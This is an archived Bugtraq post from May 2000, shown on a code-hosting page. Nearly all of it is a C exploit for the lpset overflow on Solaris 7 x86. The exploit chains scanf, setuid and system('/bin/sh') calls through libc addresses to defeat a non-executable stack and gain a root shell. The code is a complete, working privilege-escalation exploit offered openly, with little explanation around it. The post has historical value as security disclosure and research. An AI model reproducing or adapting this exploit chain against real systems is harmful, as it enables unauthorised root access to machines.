-
Notifications
You must be signed in to change notification settings - Fork 0
/
20000506_Bugtraq.txt
59 lines (47 loc) · 1.28 KB
/
20000506_Bugtraq.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
Subject: non-exec stack
From: newsham () LAVA NET (Tim Newsham)
Date: Sat, 6 May 2000 17:06:28 -1000
Here's an overflow exploit that works on a non-exec stack on x86 boxes.
It demonstrates how it is possible to thread together several libc
calls. I have not seen any other exploits for x86 that have done this..
for the lpset bug in sol7 x86.
Tim N.
#define BASE 0xdff40000
#define STACK 0x8047e30
#define BUFSIZE 36
#define SYSTEM (BASE + 0x5b328)
#define SCANF (BASE + 0x5ae80)
#define SETUID (BASE + 0x30873)
#define PERCD (BASE + 0x83754)
#define BINSH (BASE + 0x83654)
#define POP3 (SYSTEM + 610)
#define POP2 (SYSTEM + 611)
#define POP1 (SYSTEM + 612)
int
main()
{
unsigned char expbuf[1024];
char *env[1];
int *p, i;
memset(expbuf, 'a', BUFSIZE);
p = (int *)(expbuf + BUFSIZE);
*p++ = STACK;
*p++ = SCANF + 1;
*p++ = STACK + 6 * 4;
*p++ = POP2;
*p++ = PERCD;
*p++ = STACK + 9 * 4;
*p++ = STACK + 10 * 4;
*p++ = SETUID;
*p++ = POP1;
*p++ = 0x33333333;
*p++ = STACK + 15 * 4;
*p++ = SYSTEM;
*p++ = 0x33333333;
*p++ = BINSH;
*p = 0;
env[0] = 0;
execle("/bin/lpset", "/bin/lpset", "-n", "fns", "-r", expbuf, "123", 0,
env);
return 0;
}